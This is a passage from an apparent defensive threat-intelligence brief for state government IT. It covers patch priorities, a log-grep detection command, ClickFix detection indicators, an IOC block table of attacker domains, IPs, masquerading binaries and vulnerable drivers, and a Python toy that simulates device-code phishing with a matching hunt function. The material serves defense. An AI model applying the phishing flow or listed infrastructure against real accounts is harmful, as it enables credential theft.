<ul> <li> <strong> Primary threat: </strong> Ransomware groups (25 affected by First VPN takedown) historically target financial data for double extortion </li> <li> <strong> Immediate action: </strong> Verify Veeam backup infrastructure is isolated from domain credentials — Abyss Locker specifically targets backup deletion before encryption </li> <li> <strong> Detection focus: </strong> Monitor for OAuth device code phishing (Kali365) against treasury M365 accounts; these hold wire transfer authorization </li> <li> <strong> Regulatory note: </strong> India's 12-hour patching mandate for exploited vulnerabilities signals global regulatory direction — prepare for similar U.S. state-level requirements </li>
</ul>
<h3> <strong> Energy (State-Operated Utilities, Grid Coordination) </strong>
</h3>
<ul> <li> <strong> Primary threat: </strong> Volt Typhoon pre-positioning for disruption during geopolitical escalation; ABB ICS vulnerabilities in deployed equipment </li> <li> <strong> Immediate action: </strong> Inventory ABB AC500 V2 PLCs and Zenon SCADA runtime deployments; cross-reference against ICSA-26-146-01 through -06 </li> <li> <strong> Detection focus: </strong> Living-off-the-land activity in OT networks — legitimate admin tools (PowerShell, WMI, PsExec) executing from unexpected source hosts </li> <li> <strong> Architecture: </strong> Ensure OT/IT network segmentation prevents SharePoint or cPanel compromises from pivoting to control system networks </li>
</ul>
<h3> <strong> Healthcare (State Health Agencies, Medicaid Systems) </strong>
</h3>
<ul> <li> <strong> Primary threat: </strong> Ransomware targeting citizen health records (high extortion value); Ghost CMS ClickFix campaign could compromise public health information portals </li> <li> <strong> Immediate action: </strong> Audit any Ghost CMS instances hosting public health information; patch to 6.19.1+ and rotate API keys </li> <li> <strong> Detection focus: </strong> ClickFix lures on state health websites could deliver malware to citizens — monitor for reports of fake CAPTCHA screens on .gov health portals </li> <li> <strong> Regulatory note: </strong> HIPAA breach notification obligations amplify ransomware impact; ensure incident response plans account for 60-day notification timeline </li>
</ul>
<h3> <strong> Government (Executive Agencies, Legislative, Judicial) </strong>
</h3>
<ul> <li> <strong> Primary threat: </strong> Nation-state espionage (Volt Typhoon, Salt Typhoon, Nimbus Manticore); credential theft via Kali365 MFA bypass; SharePoint RCE for document exfiltration </li> <li> <strong> Immediate action: </strong> Patch SharePoint Server across all branches; implement conditional access policies blocking authentication from VPN/proxy ASNs </li> <li> <strong> Detection focus: </strong> Impossible travel on executive accounts; SharePoint document access anomalies (bulk downloads, access to sensitive libraries by accounts that don't normally touch them) </li> <li> <strong> Policy consideration: </strong> Dutch government blocked U.S. acquisition of DigiD on digital sovereignty grounds — monitor for similar state-level digital identity policy developments </li>
</ul>
<h3> <strong> Aviation & Logistics (State DOT, Airport Authorities, Port Systems) </strong>
</h3>
<ul> <li> <strong> Primary threat: </strong> Nimbus Manticore (IRGC/UNC1549) Operation Epic Fury specifically targets aviation; supply chain compromise through logistics software dependencies </li> <li> <strong> Immediate action: </strong> Review npm/PyPI dependencies in any custom logistics or scheduling applications — Glassworm botnet spread through these ecosystems since September 2025 </li> <li> <strong> Detection focus: </strong> SEO poisoning redirects from transportation-related searches; unusual DNS queries from logistics management systems </li> <li> <strong> Architecture: </strong> Ensure air-gapped or segmented networks for traffic management and port control systems; ABB EV charger vulnerabilities (ICSA-26-146-01) affect transportation infrastructure </li>
</ul>
<h2> <strong> Prioritized Defense Recommendations </strong>
</h2>
<h3> <strong> IMMEDIATE (Within 48 Hours) </strong>
</h3>
<table> <thead> <tr> <th> <p> <strong> Priority </strong> </p> </th> <th> <p> <strong> Owner </strong> </p> </th> <th> <p> <strong> Action </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 1 </p> </td> <td> <p> IT Operations </p> </td> <td> <p> <strong> Audit and patch all cPanel/LiteSpeed installations </strong> for CVE-2026-48172. Upgrade to WHM Plugin 5.3.1.0+. CISA KEV deadline: 29 May. Run detection: <code>grep -rE "cpanel_jsonapi_func=redisAble" /var/cpanel/logs /usr/local/cpanel/logs/</code> </p> </td> </tr> <tr> <td> <p> 2 </p> </td> <td> <p> IT Operations </p> </td> <td> <p> <strong> Apply May 2026 SharePoint security updates </strong> (CVE-2026-45659) to all SharePoint Server instances. Prioritize internet-facing and hybrid-connected farms. Authorize emergency change window if needed. </p> </td> </tr> <tr> <td> <p> 3 </p> </td> <td> <p> IT Operations </p> </td> <td> <p> <strong> Patch or isolate all Ghost CMS instances </strong> below version 6.19.1. Rotate all Admin API keys. Audit published content for injected JavaScript (&lt;script&gt; tags not in original templates). </p> </td> </tr> <tr> <td> <p> 4 </p> </td> <td> <p> SOC </p> </td> <td> <p> <strong> Verify Drupal CVE-2026-9082 remediation is complete </strong> — today (27 May) is the CISA KEV deadline for this vulnerability. Confirm no state Drupal instances remain unpatched. </p> </td> </tr> <tr> <td> <p> 5 </p> </td> <td> <p> SOC </p> </td> <td> <p> <strong> Deploy detection rules </strong> for ClickFix indicators: PowerShell spawned by browsers or by explorer.exe (Run dialog), Base64 commands &gt;500 chars, rundll32.exe loading DLLs from temp directories. </p> </td> </tr> </tbody>
</table>
<h3> <strong> 7-DAY </strong>
</h3>
<table> <thead> <tr> <th> <p> <strong> Priority </strong> </p> </th> <th> <p> <strong> Owner </strong> </p> </th> <th> <p> <strong> Action </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 6 </p> </td> <td> <p> Network Security </p> </td> <td> <p> <strong> Block or alert on VLESS/Reality protocol traffic </strong> on HTTPS ports. Use JA3/JA4 fingerprinting as one input for VPN-over-HTTPS tunneling, corroborated with destination reputation and flow duration and volume, since Reality relays a genuine TLS handshake and mimics browser fingerprints. </p> </td> </tr> <tr> <td> <p> 7 </p> </td> <td> <p> SOC </p> </td> <td> <p> <strong> Implement conditional access policies </strong> blocking M365 and VPN authentication from known proxy/anonymizer ASNs. Cross-reference ASN 399629 (BL Networks) against historical auth logs. </p> </td> </tr> <tr> <td> <p> 8 </p> </td> <td> <p> Identity Team </p> </td> <td> <p> <strong> Audit OAuth device code flow usage </strong> in Microsoft Entra ID (Azure AD) sign-in logs, then use a Conditional Access policy with the Authentication flows condition to block device code flow for all users, excepting only the specific accounts and managed devices that genuinely need it. Device code phishing does not break MFA; it has the victim satisfy MFA for a session the attacker started, so removing the flow is the control that works. </p> </td> </tr> <tr> <td> <p> 9 </p> </td> <td> <p> IT Operations </p> </td> <td> <p> <strong> Inventory all ABB ICS deployments </strong> (AC500 V2 PLCs, Zenon SCADA, Terra AC chargers, B&amp;R Automation Runtime). Cross-reference against CISA advisories ICSA-26-146-01 through -06. Schedule vendor-recommended updates. </p> </td> </tr> <tr> <td> <p> 10 </p> </td> <td> <p> Development/DevOps </p> </td> <td> <p> <strong> Audit npm and PyPI dependencies </strong> in all state-developed applications for Glassworm botnet indicators. Pin dependencies to exact versions with lockfile integrity hashes (commit SHAs for git-sourced packages). Review VS Code extensions installed on developer workstations. </p> </td> </tr> </tbody>
</table>
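<p> Priority 8, the Kali365 entries in the What Changed table, and the T1078 hunting row all rest on one mechanism: in the OAuth device authorization grant (RFC 8628) the party that requests the code is the one that receives the tokens, while the person who types the code is the one who does MFA. The toy exchange below, added to this brief as an illustration and not Microsoft's implementation, walks all three steps with both sides' messages and shows where the hunting signal lives. The endpoint URI, client id and IP addresses are placeholders; the sign-in record mirrors the idea of a sign-in log entry (Entra exposes the flow in an authentication protocol field), not the exact schema. </p>

```python
"""Why device-code phishing (Kali365-style) gets past MFA: a toy RFC 8628 exchange.

Illustrative code added to this brief, not Microsoft's implementation. Endpoint
names, client id and IP addresses are placeholders; the sign-in record mirrors
the idea of a sign-in log, not the real schema.
"""
import secrets

class ToyAuthorizationServer:
    """Minimal device authorization grant: /devicecode, user approval, /token."""

    def __init__(self):
        self.pending = {}                       # device_code -> grant record

    def device_authorization(self, client_id, scope, requester_ip):
        """Step 1 (client side): anyone can start a flow; nothing here authenticates the user."""
        device_code = secrets.token_urlsafe(32)
        user_code = secrets.token_hex(2).upper() + "-" + secrets.token_hex(2).upper()
        self.pending[device_code] = {
            "client_id": client_id, "scope": scope, "user_code": user_code,
            "requester_ip": requester_ip, "approved_by": None, "mfa_ip": None,
        }
        return {"device_code": device_code, "user_code": user_code,
                "verification_uri": "https://login.example/devicelogin", "interval": 5}

    def user_approves(self, user_code, username, mfa_passed, user_ip):
        """Step 2 (user side): whoever types the code signs in, with MFA, on the genuine site."""
        for rec in self.pending.values():
            if rec["user_code"] == user_code and rec["approved_by"] is None:
                if not mfa_passed:
                    return False
                rec["approved_by"], rec["mfa_ip"] = username, user_ip
                return True
        return False

    def token(self, device_code, client_id, caller_ip, signin_log):
        """Step 3 (client side): the holder of device_code polls; tokens go to the poller."""
        rec = self.pending.get(device_code)
        if rec is None or rec["client_id"] != client_id:
            return {"error": "invalid_grant"}
        if rec["approved_by"] is None:
            return {"error": "authorization_pending"}
        signin_log.append({"user": rec["approved_by"], "protocol": "deviceCode",
                           "token_issued_to_ip": caller_ip, "mfa_completed_from_ip": rec["mfa_ip"]})
        del self.pending[device_code]
        return {"access_token": secrets.token_urlsafe(24), "scope": rec["scope"]}

def run_phish(attacker_ip="203.0.113.66", victim_ip="198.51.100.24"):
    """The attack end to end; returns the token response and the resulting sign-in log."""
    az, log = ToyAuthorizationServer(), []
    # 1. attacker starts the flow and gets a user_code to put in the lure
    start = az.device_authorization("mail-client", "Mail.Read offline_access", attacker_ip)
    # 2. victim follows the lure, enters the code on the real login page and passes MFA
    az.user_approves(start["user_code"], "jdoe@state.example", mfa_passed=True, user_ip=victim_ip)
    # 3. attacker's poll now succeeds; MFA was satisfied, just not by the attacker
    token = az.token(start["device_code"], "mail-client", attacker_ip, log)
    return token, log

def flag_device_code_signins(signin_log, trusted_prefixes=("198.51.100.",)):
    """Hunt: device-code sign-ins whose token went to an address outside the agency's ranges."""
    return [e for e in signin_log
            if e["protocol"] == "deviceCode" and not e["token_issued_to_ip"].startswith(trusted_prefixes)]

if __name__ == "__main__":
    token, log = run_phish()
    print("attacker holds a token:", "access_token" in token)
    print("flagged sign-ins:", flag_device_code_signins(log))
```

<p> The record appended in step 3 is the detection: the token is issued to the attacker's address while MFA was completed from the victim's, so a device-code sign-in from an address outside your ranges (or from a proxy/anonymizer ASN, per priority 7) is the thing to alert on. Note that only the attacker ever talks to the token endpoint; the victim's browser session looks like an ordinary successful MFA sign-in, which is why the brief's fix is to block the flow rather than tune MFA. </p>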
<h3> <strong> 30-DAY (Strategic) </strong>
</h3>
<table> <thead> <tr> <th> <p> <strong> Priority </strong> </p> </th> <th> <p> <strong> Owner </strong> </p> </th> <th> <p> <strong> Action </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 11 </p> </td> <td> <p> CISO </p> </td> <td> <p> <strong> Reassess patch management SLAs in light of AI-accelerated exploit discovery. Current 30-day windows for critical vulnerabilities are inadequate. Recommend: 72-hour SLA for internet-facing systems with active exploitation, 7-day for critical CVSS without exploitation evidence. </strong> </p> </td> </tr> <tr> <td> <p> 12 </p> </td> <td> <p> CISO </p> </td> <td> <p> <strong> Commission red team assessment </strong> of SharePoint hybrid environments, focusing on privilege escalation paths from Site Member to server-level code execution. </p> </td> </tr> <tr> <td> <p> 13 </p> </td> <td> <p> CISO/Legal </p> </td> <td> <p> <strong> Review incident response plans </strong> for ransomware scenarios accounting for the post-takedown period. Groups migrating infrastructure often test new capabilities against targets of opportunity. Ensure backup isolation, communication plans, and legal/regulatory notification timelines are current. </p> </td> </tr> <tr> <td> <p> 14 </p> </td> <td> <p> IT Operations </p> </td> <td> <p> <strong> Implement network segmentation review </strong> ensuring OT/ICS networks (building automation, water/wastewater SCADA, traffic management) cannot be reached from compromised IT systems (SharePoint, cPanel, Ghost CMS). </p> </td> </tr> <tr> <td> <p> 15 </p> </td> <td> <p> CISO </p> </td> <td> <p> <strong> Evaluate OSINT and threat intelligence feed coverage — persistent gaps in open-source intelligence collection may be masking nation-state activity reporting. Ensure at least two independent intelligence sources cover each critical threat vector. </strong> </p> </td> </tr> </tbody>
</table>
<h2> <strong> IOC Blocking Table </strong>
</h2>
<p> The following indicators are derived from intelligence collection for the campaigns discussed in this report. Implement blocking and alerting as appropriate to your environment.
</p>
<p> <strong> <em> Note on file hashes: </em> </strong> <em> SHA-256 hashes for malware samples associated with these campaigns are available through Anomali ThreatStream Next-Gen and partner feeds. See the ThreatStream Next-Gen collection for CVE-2026-26980 (Ghost CMS), CVE-2026-48172 (LiteSpeed), and the First VPN Service takedown for current, verified file indicators. </em>
</p>
<table> <thead> <tr> <th> <p> <strong> Type </strong> </p> </th> <th> <p> <strong> Value </strong> </p> </th> <th> <p> <strong> Context </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> Domain </p> </td> <td> <p> Exploit[.]in </p> </td> <td> <p> Underground forum advertising criminal VPN/ransomware services </p> </td> </tr> <tr> <td> <p> Domain </p> </td> <td> <p> XSS[.]is </p> </td> <td> <p> Underground forum advertising criminal VPN/ransomware services </p> </td> </tr> <tr> <td> <p> Domain </p> </td> <td> <p> discordapp[.]com </p> </td> <td> <p> Abused for C2 and payload delivery in multiple campaigns — alert on unexpected outbound connections from servers and non-user workstations; do not block wholesale in user environments </p> </td> </tr> <tr> <td> <p> Process Name </p> </td> <td> <p> rundll32.exe </p> </td> <td> <p> Abused as a signed proxy (T1218.011) to load the ClickFix second-stage DLL. It is a Windows system binary, so alert on context (DLL path under temp or download directories, parent powershell.exe) rather than blocking the name </p> </td> </tr> <tr> <td> <p> Process Name </p> </td> <td> <p> feedbackAPI.exe </p> </td> <td> <p> Suspicious executable associated with tracked malware </p> </td> </tr> <tr> <td> <p> Process Name </p> </td> <td> <p> SophosAV.exe / auSophos.exe </p> </td> <td> <p> Masquerading filenames (not legitimate Sophos binaries) </p> </td> </tr> <tr> <td> <p> Process Name </p> </td> <td> <p> wmihelper.exe </p> </td> <td> <p> Suspicious WMI helper associated with persistence mechanisms </p> </td> </tr> <tr> <td> <p> Driver </p> </td> <td> <p> UpdateDrv.sys / ped.sys / 3ware.sys </p> </td> <td> <p> BYOVD (Bring Your Own Vulnerable Driver) candidates </p> </td> </tr> <tr> <td> <p> IPv4 </p> </td> <td> <p> 64.95.12[.]57 </p> </td> <td> <p> Infrastructure associated with tracked campaigns </p> </td> </tr> <tr> <td> <p> IPv4 </p> </td> <td> <p> 64.95.12[.]70 </p> </td> <td> <p> Infrastructure associated with tracked campaigns </p> </td> </tr> <tr> <td> <p> IPv4 </p> </td> <td> <p> 64.95.12[.]238 </p> </td> <td> <p> Infrastructure associated with tracked campaigns </p> </td> </tr> <tr> <td> <p> IPv4 </p> 
</td> <td> <p> 64.95.12[.]59 </p> </td> <td> <p> Infrastructure associated with tracked campaigns </p> </td> </tr> <tr> <td> <p> IPv4 </p> </td> <td> <p> 64.95.12[.]114 </p> </td> <td> <p> Infrastructure associated with tracked campaigns </p> </td> </tr> </tbody>
</table>
<p> Additional IOCs — including verified file hashes — for the campaigns discussed in this report are available through ThreatStream Next-Gen and partner feeds.
</p>
<h2> <strong> The Bottom Line </strong>
</h2>
<p> State government IT leaders face a week where three separate CVSS 9.0+ vulnerabilities demand simultaneous emergency response, the ransomware ecosystem is temporarily disrupted but actively adapting, and the fundamental economics of exploit discovery have permanently shifted against defenders.
</p>
<p> The 29 May CISA KEV deadline for CVE-2026-48172 is binding on federal agencies under BOD 22-01 and is the benchmark state agencies should hold themselves to. SharePoint and Ghost CMS patching cannot wait for the next scheduled maintenance window. And the strategic reality, that AI can now discover critical exploits faster and cheaper than organizations can deploy patches, demands a policy-level conversation about whether current patch SLAs are fit for purpose.
</p>
<p> The FBI's disruption of criminal VPN infrastructure buys time, not safety. Use that window to harden, patch, and hunt. The adversaries will be back online within two weeks with new infrastructure and renewed motivation.
</p>
<p> <strong> Act now. The math has changed. </strong>
</p>
<p> <em> Anomali CTI Desk | 2026-05-27 | TLP:GREEN </em>
</p>
<p> <em> For questions or additional IOC feeds, contact your Anomali account team or access indicators directly via ThreatStream Next-Gen. </em>
</p>